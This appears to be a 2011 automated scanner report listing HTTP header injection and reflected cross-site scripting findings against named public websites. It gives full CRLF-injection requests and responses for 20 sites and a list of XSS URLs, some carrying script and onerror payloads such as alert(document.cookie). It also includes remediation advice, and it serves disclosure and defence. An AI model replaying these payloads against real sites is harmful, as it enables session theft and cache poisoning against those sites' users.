XSS, DORKS, /favicon.ico, CWE-79, CAPEC-86, Report for March 31, 2011

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Report generated by XSS.CX at Thu Mar 31 14:40:10 CDT 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler

Loading

1. HTTP header injection

1.1. http://addictinggames.com/favicon.ico [REST URL parameter 1]

1.2. http://cartoonnetwork.com/favicon.ico [REST URL parameter 1]

1.3. http://christianbook.com/favicon.ico [REST URL parameter 1]

1.4. http://cmt.com/favicon.ico [REST URL parameter 1]

1.5. http://comedycentral.com/favicon.ico [REST URL parameter 1]

1.6. http://ew.com/favicon.ico [REST URL parameter 1]

1.7. http://gametrailers.com/favicon.ico [REST URL parameter 1]

1.8. http://health.com/favicon.ico [REST URL parameter 1]

1.9. http://myrecipes.com/favicon.ico [REST URL parameter 1]

1.10. http://nickjr.com/favicon.ico [REST URL parameter 1]

1.11. http://parentsconnect.com/favicon.ico [REST URL parameter 1]

1.12. http://ratemyprofessors.com/favicon.ico [REST URL parameter 1]

1.13. http://realsimple.com/favicon.ico [REST URL parameter 1]

1.14. http://salesforce.com/favicon.ico [REST URL parameter 1]

1.15. http://shockwave.com/favicon.ico [REST URL parameter 1]

1.16. http://shop.com/favicon.ico [name of an arbitrarily supplied request parameter]

1.17. http://spike.com/favicon.ico [REST URL parameter 1]

1.18. http://thedailyshow.com/favicon.ico [REST URL parameter 1]

1.19. http://vuze.com/favicon.ico [REST URL parameter 1]

1.20. http://youravon.com/favicon.ico [REST URL parameter 1]

2. Cross-site scripting (reflected)

2.1. http://ad.doubleclick.net/adj/buz.egotastic/ros [pos parameter]

2.2. http://b3.mookie1.com/2/B3DM/DLX/1@x71 [REST URL parameter 2]

2.3. http://b3.mookie1.com/2/B3DM/DLX/1@x71 [REST URL parameter 3]

2.4. http://b3.mookie1.com/2/B3DM/DLX/1@x71 [REST URL parameter 4]

2.5. http://canada.com/favicon.ico [name of an arbitrarily supplied request parameter]

2.6. http://egotastic.com/favicon.ico [REST URL parameter 1]

2.7. http://egotastic.com/favicon.ico [REST URL parameter 1]

2.8. http://egotastic.com/favicon.ico63db6%3Cscript%3Ealert(document.cookie)%3C/contact-form/gbcf_styles.css [REST URL parameter 1]

2.9. http://egotastic.com/favicon.ico63db6%3Cscript%3Ealert(document.cookie)%3C/contact-form/gbcf_styles.css [REST URL parameter 1]

2.10. http://egotastic.com/favicon.ico63db6%3Cscript%3Ealert(document.cookie)%3C/contact-form/gbcf_styles.css [REST URL parameter 2]

2.11. http://egotastic.com/favicon.ico63db6%3Cscript%3Ealert(document.cookie)%3C/contact-form/gbcf_styles.css [REST URL parameter 2]

2.12. http://egotastic.com/favicon.ico63db6%3Cscript%3Ealert(document.cookie)%3C/contact-form/gbcf_styles.css [REST URL parameter 3]

2.13. http://egotastic.com/favicon.ico63db6%3Cscript%3Ealert(document.cookie)%3C/contact-form/gbcf_styles.css [REST URL parameter 3]

2.14. http://egotastic.com/favicon.ico63db6%3Cscript%3Ealert(document.cookie)%3C/contact-form/gbcf_styles.css [name of an arbitrarily supplied request parameter]

2.15. http://egotastic.com/favicon.ico63db6%3Cscript%3Ealert(document.cookie)%3C/contact-form/gbcf_styles.css [name of an arbitrarily supplied request parameter]

2.16. http://ehealthforum.com/favicon.ico [REST URL parameter 1]

2.17. http://g2.gumgum.com/services/get [callback parameter]

2.18. http://kotaku.com/favicon.ico [REST URL parameter 1]

2.19. http://multiply.com/favicon.ico [REST URL parameter 1]

2.20. http://my.wn.com/jsonx/41ff8_%3E%3Cimg_src%3Da_onerror%3Dalert_1_%3Ef8c4a59ad81 [REST URL parameter 2]

2.21. http://my.wn.com/jsonx/41ff8_%3E%3Cimg_src%3Da_onerror%3Dalert_1_%3Ef8c4a59ad81 [callback parameter]

2.22. http://my.wn.com/jsonx/41ff8_%3E%3Cimg_src%3Da_onerror%3Dalert_xss_%3Ef8c4a59ad81 [REST URL parameter 2]

2.23. http://my.wn.com/jsonx/41ff8_%3E%3Cimg_src%3Da_onerror%3Dalert_xss_%3Ef8c4a59ad81 [callback parameter]

2.24. http://pixel.adsafeprotected.com/jspix [advId parameter]

2.25. http://pixel.adsafeprotected.com/jspix [anId parameter]

2.26. http://pixel.adsafeprotected.com/jspix [campId parameter]

2.27. http://pixel.adsafeprotected.com/jspix [chanId parameter]

2.28. http://pixel.adsafeprotected.com/jspix [name of an arbitrarily supplied request parameter]

2.29. http://pixel.adsafeprotected.com/jspix [placementId parameter]

2.30. http://pixel.adsafeprotected.com/jspix [pubId parameter]

2.31. http://pubads.g.doubleclick.net/gampad/ads [slotname parameter]

2.32. http://s29.sitemeter.com/js/counter.js [site parameter]

2.33. http://sm8.sitemeter.com/js/counter.js [site parameter]

2.34. http://wn.com/41ff8%22%3E%3Cimg_src=a_onerror=alert(%22XSS%22)%3Ef8c4a59ad81 [REST URL parameter 1]

2.35. http://wn.com/41ff8%22%3E%3Cimg_src=a_onerror=alert(%22XSS%22)%3Ef8c4a59ad81 [REST URL parameter 1]

2.36. http://wn.com/41ff8%22%3E%3Cimg_src=a_onerror=alert(%22XSS%22)%3Ef8c4a59ad81 [REST URL parameter 1]

2.37. http://wn.com/41ff8%22%3E%3Cimg_src=a_onerror=alert(%22XSS%22)%3Ef8c4a59ad81 [REST URL parameter 1]

2.38. http://wn.com/41ff8%22%3E%3Cimg_src=a_onerror=alert(%22XSS%22)%3Ef8c4a59ad81 [REST URL parameter 1]

2.39. http://wn.com/a [REST URL parameter 1]

2.40. http://wn.com/a [REST URL parameter 1]

2.41. http://wn.com/a [REST URL parameter 1]

2.42. http://wn.com/a [REST URL parameter 1]

2.43. http://wn.com/favicon.ico [REST URL parameter 1]

2.44. http://wn.com/favicon.ico [REST URL parameter 1]

2.45. http://wn.com/favicon.ico [REST URL parameter 1]

2.46. http://wn.com/favicon.ico [REST URL parameter 1]

2.47. http://pixel.adsafeprotected.com/jspix [Referer HTTP header]

2.48. http://aolnews.com/favicon.ico [name of an arbitrarily supplied request parameter]

2.49. http://autozone.com/favicon.ico [REST URL parameter 1]

2.50. http://autozone.com/favicon.ico [name of an arbitrarily supplied request parameter]

2.51. http://cheapoair.com/favicon.ico [REST URL parameter 1]

2.52. http://cheapoair.com/favicon.ico [name of an arbitrarily supplied request parameter]

2.53. http://earthlink.net/favicon.ico [REST URL parameter 1]

2.54. http://earthlink.net/favicon.ico [name of an arbitrarily supplied request parameter]

2.55. http://games.com/favicon.ico [name of an arbitrarily supplied request parameter]

2.56. http://newegg.com/favicon.ico [REST URL parameter 1]

2.57. http://newegg.com/favicon.ico [name of an arbitrarily supplied request parameter]

2.58. http://popeater.com/favicon.ico [name of an arbitrarily supplied request parameter]

2.59. http://salesforce.com/favicon.ico [REST URL parameter 1]

2.60. http://salesforce.com/favicon.ico [REST URL parameter 1]

2.61. http://salesforce.com/favicon.ico [name of an arbitrarily supplied request parameter]

2.62. http://salesforce.com/favicon.ico [name of an arbitrarily supplied request parameter]

2.63. http://shop.com/favicon.ico [name of an arbitrarily supplied request parameter]

2.64. http://shop.com/favicon.ico [name of an arbitrarily supplied request parameter]

2.65. http://slate.com/favicon.ico [name of an arbitrarily supplied request parameter]

2.66. http://slate.com/favicon.ico [name of an arbitrarily supplied request parameter]

2.67. http://stltoday.com/favicon.ico [REST URL parameter 1]

2.68. http://stylelist.com/favicon.ico [name of an arbitrarily supplied request parameter]

2.69. http://tvsquad.com/favicon.ico [name of an arbitrarily supplied request parameter]

2.70. http://redcated/iaction/adoapn_AppNexusDemoActionTag_1 [AA002 cookie]

2.71. http://wirefly.com/favicon.ico [name of an arbitrarily supplied request parameter]

2.72. http://wirefly.com/favicon.ico [name of an arbitrarily supplied request parameter]



1. HTTP header injection  next
There are 20 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


1.1. http://addictinggames.com/favicon.ico [REST URL parameter 1]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://addictinggames.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 98d66%0d%0a8c5a4a76f29 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /98d66%0d%0a8c5a4a76f29 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: addictinggames.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Date: Thu, 31 Mar 2011 19:06:46 GMT
Server: Apache/2.0.59 (Unix)
Location: http://www.addictinggames.com/98d66
8c5a4a76f29

Content-Length: 338
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.addictinggam
...[SNIP]...

1.2. http://cartoonnetwork.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cartoonnetwork.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 4afab%0d%0af6c787237d2 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /4afab%0d%0af6c787237d2 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: cartoonnetwork.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Date: Thu, 31 Mar 2011 19:25:39 GMT
Server: Apache
Location: http://www.cartoonnetwork.com/4afab
f6c787237d2

Vary: Accept-Encoding
Content-Length: 256
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.cartoonnetwo
...[SNIP]...

1.3. http://christianbook.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://christianbook.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload da001%0d%0ac98afa53d48 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /da001%0d%0ac98afa53d48 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: christianbook.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Date: Thu, 31 Mar 2011 19:33:33 GMT
Server: Apache/1.3.42 (Unix) mod_perl/1.31
Location: http://www.christianbook.com/da001
c98afa53d48

Content-Type: text/html; charset=iso-8859-1
Content-Length: 251

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>301 Moved Permanently</TITLE>
</HEAD><BODY>
<H1>Moved Permanently</H1>
The document has moved <A HREF="http://www.christianbook.c
...[SNIP]...

1.4. http://cmt.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cmt.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 27233%0d%0a9f7ed2a2901 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /27233%0d%0a9f7ed2a2901 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: cmt.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Date: Thu, 31 Mar 2011 19:32:30 GMT
Server: Apache/2.0.58 (Unix)
Location: http://www.cmt.com/27233
9f7ed2a2901

Content-Length: 316
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.cmt.com/2723
...[SNIP]...

1.5. http://comedycentral.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://comedycentral.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload f88f0%0d%0adced807bdf9 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /f88f0%0d%0adced807bdf9 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: comedycentral.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Date: Thu, 31 Mar 2011 19:07:37 GMT
Server: Apache/2.0.58 (Unix)
Location: http://www.comedycentral.com/f88f0
dced807bdf9

Content-Length: 336
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.comedycentra
...[SNIP]...

1.6. http://ew.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ew.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 23c01%0d%0a3eb8147f033 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /23c01%0d%0a3eb8147f033 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: ew.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Date: Thu, 31 Mar 2011 19:04:00 GMT
Location: http://www.ew.com/23c01
3eb8147f033

Vary: Accept-Encoding
Content-Length: 300
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.ew.com/23c01
...[SNIP]...

1.7. http://gametrailers.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://gametrailers.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload f91e7%0d%0aeea7a389800 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /f91e7%0d%0aeea7a389800 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: gametrailers.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Date: Thu, 31 Mar 2011 19:08:02 GMT
Server: Apache/2.0.58 (Unix)
Location: http://www.gametrailers.com/f91e7
eea7a389800

Content-Length: 334
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.gametrailers
...[SNIP]...

1.8. http://health.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://health.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 35807%0d%0a58044edf46d was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /35807%0d%0a58044edf46d HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: health.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Date: Thu, 31 Mar 2011 19:30:18 GMT
Location: http://www.health.com/35807
58044edf46d

Vary: Accept-Encoding
Content-Length: 308
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.health.com/3
...[SNIP]...

1.9. http://myrecipes.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://myrecipes.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 5b34f%0d%0a1cc9d93ca97 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /5b34f%0d%0a1cc9d93ca97 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: myrecipes.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Date: Thu, 31 Mar 2011 19:11:51 GMT
Location: http://www.myrecipes.com/5b34f
1cc9d93ca97

Content-Length: 314
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.myrecipes.co
...[SNIP]...

1.10. http://nickjr.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nickjr.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload b589e%0d%0a1037f2e8b48 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /b589e%0d%0a1037f2e8b48 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: nickjr.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Date: Thu, 31 Mar 2011 19:03:21 GMT
Server: Apache/2.0.58 (Unix)
Location: http://www.nickjr.com/b589e
1037f2e8b48

Content-Length: 322
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.nickjr.com/b
...[SNIP]...

1.11. http://parentsconnect.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://parentsconnect.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 83bbc%0d%0a0d24d89bbe was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /83bbc%0d%0a0d24d89bbe HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: parentsconnect.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Date: Thu, 31 Mar 2011 19:07:26 GMT
Server: Apache/2.0.59 (Unix)
Location: http://www.parentsconnect.com/83bbc
0d24d89bbe

Content-Length: 337
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.parentsconne
...[SNIP]...

1.12. http://ratemyprofessors.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ratemyprofessors.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload ab968%0d%0a2cd8957e77 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /ab968%0d%0a2cd8957e77 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: ratemyprofessors.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Date: Thu, 31 Mar 2011 19:26:57 GMT
Server: Apache/2.0.59 (Unix)
Location: http://www.ratemyprofessors.com/ab968
2cd8957e77

Content-Length: 341
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.ratemyprofes
...[SNIP]...

1.13. http://realsimple.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://realsimple.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload f4ebf%0d%0add24e90803a was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /f4ebf%0d%0add24e90803a HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: realsimple.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Date: Thu, 31 Mar 2011 19:25:20 GMT
Location: http://www.realsimple.com/f4ebf
dd24e90803a

Content-Length: 316
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.realsimple.c
...[SNIP]...

1.14. http://salesforce.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://salesforce.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 64768%0d%0af9bb499bc4c was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /64768%0d%0af9bb499bc4c HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: salesforce.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Server: SFDC
Location: http://www.salesforce.com/64768
f9bb499bc4c

Date: Thu, 31 Mar 2011 19:26:39 GMT
Content-Length: 125

The URL has moved to <a href="http://www.salesforce.com/64768
f9bb499bc4c">http://www.salesforce.com/64768
f9bb499bc4c</a>

1.15. http://shockwave.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://shockwave.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 97b79%0d%0a1a293fec36a was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /97b79%0d%0a1a293fec36a HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: shockwave.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Date: Thu, 31 Mar 2011 19:25:38 GMT
Server: Apache/2.0.59 (Unix)
Location: http://www.shockwave.com/97b79
1a293fec36a

Content-Length: 328
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.shockwave.co
...[SNIP]...

1.16. http://shop.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 9e3f3%0d%0a8cc0434d43a was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /favicon.ico?9e3f3%0d%0a8cc0434d43a=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: shop.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 URL Redirect
Server: AMOS/1.0
Date: Thu, 31 Mar 2011 19:34:53 GMT
Content-Type: text/html
Content-Length: 301
Location: http://edge.shop.com/ccimg.shop.com/web/favicon.ico?9e3f3
8cc0434d43a
=1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache

<html><head><title>Document Moved</title>
<META URL=http://edge.shop.com/ccimg.shop.com/web/favicon.ico?9e3f3
8cc0434d43a=1">
</head>
<body><h1>Object Moved</h1>This document may be found <a href=
...[SNIP]...

1.17. http://spike.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://spike.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 1ac90%0d%0a4da1a3cb9ac was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /1ac90%0d%0a4da1a3cb9ac HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: spike.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Date: Thu, 31 Mar 2011 19:03:41 GMT
Server: Apache/2.0.58 (Unix)
Location: http://www.spike.com/1ac90
4da1a3cb9ac

Content-Length: 320
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.spike.com/1a
...[SNIP]...

1.18. http://thedailyshow.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://thedailyshow.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 6c1ba%0d%0ac857749a4fa was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /6c1ba%0d%0ac857749a4fa HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: thedailyshow.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Date: Thu, 31 Mar 2011 19:27:20 GMT
Server: Apache/2.0.58 (Unix)
Location: http://www.thedailyshow.com/6c1ba
c857749a4fa

Content-Length: 334
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.thedailyshow
...[SNIP]...

1.19. http://vuze.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://vuze.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 113b6%0d%0ad3b6dd8ecba was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /113b6%0d%0ad3b6dd8ecba HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: vuze.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Thu, 31 Mar 2011 19:28:42 GMT
Content-Type: text/html
Content-Length: 178
Connection: keep-alive
Keep-Alive: timeout=10
Location: http://www.vuze.com/113b6
d3b6dd8ecba


<html>
<head><title>301 Moved Permanently</title></head>
<body bgcolor="white">
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx</center>
</body>
</html>

1.20. http://youravon.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://youravon.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 91e2b%0d%0a94ca8568822 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /91e2b%0d%0a94ca8568822 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: youravon.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Found
Date: Thu, 31 Mar 2011 19:32:10 GMT
Server: IBM_HTTP_Server
Location: http://91e2b
94ca8568822
.avonrepresentative.com/
Content-Length: 297
Content-Type: text/html; charset=iso-8859-1

